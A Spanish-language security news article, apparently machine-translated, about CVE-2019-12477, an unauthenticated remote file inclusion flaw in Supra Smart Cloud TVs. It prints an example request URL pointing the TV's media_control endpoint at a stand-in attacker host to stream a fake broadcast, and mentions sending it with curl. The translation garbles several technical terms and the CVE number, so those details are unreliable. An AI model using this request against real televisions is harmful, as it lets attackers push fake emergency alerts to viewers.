Casa > Ciber Noticias > CVE-2019-12477: Una vulnerabilidad en la nube de TV inteligente Supra
CYBER NOTICIAS

CVE-2019-12477: Una vulnerabilidad en la nube de TV inteligente Supra

El investigador de seguridad Dhiraj Mishra acaba de descubrir una vulnerabilidad de seguridad, CVE-2019-12477, en la marca smart TV SUPRA.

Al parecer,, Supra inteligente Nube TV permite la inclusión de archivos remoto en la función openLiveURL, lo que podría permitir a un atacante local para transmitir video falso sin ningún tipo de autenticación que utiliza / remote / media_control?action = Conjuntos&uri = URI.




Más sobre CVE-2.019 a 12.477

SUPRA es una empresa rusa que fabrica equipos de audio y vídeo, electrodomésticos y electrónica del automóvil. La mayor parte de la tecnología se está distribuyendo a través de sitios web de comercio electrónico basado en Rusia, China, y EAU.

En su informe, el investigador compartida que aprovechara `openLiveURL()`Que permite a un atacante local para transmitir video en la nube supra inteligente de TV. "He encontrado esta vulnerabilidad inicialmente por la revisión de código fuente y luego, mediante el rastreo de la aplicación y la lectura de cada petición me ayudó a activar esta vulnerabilidad,”Dijo Mishra.

Relacionado: [wplinkpreview url =”https://sensorstechforum.com/smart-homes-at-risk-to-hackers/”] 40% de casas inteligentes actualmente vulnerable a la piratería.

Para activar la vulnerabilidad, un atacante sólo tendría que enviar una solicitud especialmente diseñada para la siguiente URL:

https://192.168.1.155/remoto / media_control?action = Conjuntos&uri = https://attacker.com/fake_broadcast_message.m3u8.

Aunque la URL anterior mención toma (.M3U8) formato de vídeo basado. Podemos usar `-v rizar -X GET` para enviar dicha solicitud, normalmente se trata de un archivo de inclusión remota unauth. Un atacante podría transmitir cualquier vídeo sin ninguna autenticación, el peor de los casos atacante podría aprovechar esta vulnerabilidad para transmitir un mensaje de emergencia falsa (derecho de miedo?).

El problema aquí es que la vulnerabilidad no parcheada permanece y es muy probable que se quedará de esta manera. El investigador no encontró ninguna manera de ponerse en contacto con el proveedor para informar de sus hallazgos. También hay un video de prueba de concepto que revela la explotación exitosa. El video muestra como un discurso de Steve Jobs es súbitamente reemplazado por falsa de un atacante “Mensaje de alerta de emergencia”.

La vulnerabilidad se le ha asignado un identificador de CVE, CVE-2019-12477, pero no hay información de si alguna vez será direcciones. Así, ¿qué pueden hacer los propietarios de televisores inteligentes SUPRA Nube? La respuesta corta es mantener la red inalámbrica tan segura como sea posible mediante el uso de una contraseña segura y un firewall para todos los dispositivos inteligentes. Porque, ya que estamos probadas cada día, casas inteligentes no son tan inteligentes en absoluto.

Relacionado: [wplinkpreview url =”https://sensorstechforum.com/misconfigured-mqtt-protocol-risks-smart-homes/”] Pone mal configurado Protocolo MQTT Miles de casas inteligentes en Riesgo.

Un gran ejemplo de lo fácil que es para cortar una casa inteligente proviene de investigadores de Avast. El pasado agosto, advirtieron sobre el protocolo MQTT (Transporte de mensajes de cola de telemetría) cual, si mal configurado, podría dar a los hackers el acceso completo a una casa inteligente. Como resultado de este agujero de seguridad, la casa podría ser manipulada de muchas maneras, incluyendo sus sistemas de entretenimiento y de voz, varios dispositivos de uso doméstico, y puertas inteligentes.

Milena Dimitrova

Un escritor inspirado y administrador de contenido que ha estado con SensorsTechForum desde que comenzó el proyecto.. Un profesional con 10+ años de experiencia en la creación de contenido atractivo. Centrado en la privacidad de los usuarios y el desarrollo de malware, ella cree firmemente en un mundo donde la seguridad cibernética juega un papel central. Si el sentido común no tiene sentido, ella estará allí para tomar notas. Esas notas pueden convertirse más tarde en artículos! Siga Milena @Milenyim

Más Mensajes

Sígueme:
Gorjeo

Dejar un comentario

Su dirección de correo electrónico no será publicada. Los campos necesarios están marcados *

This website uses cookies to improve user experience. By using our website you consent to all cookies in accordance with our política de privacidad.
Estoy de acuerdo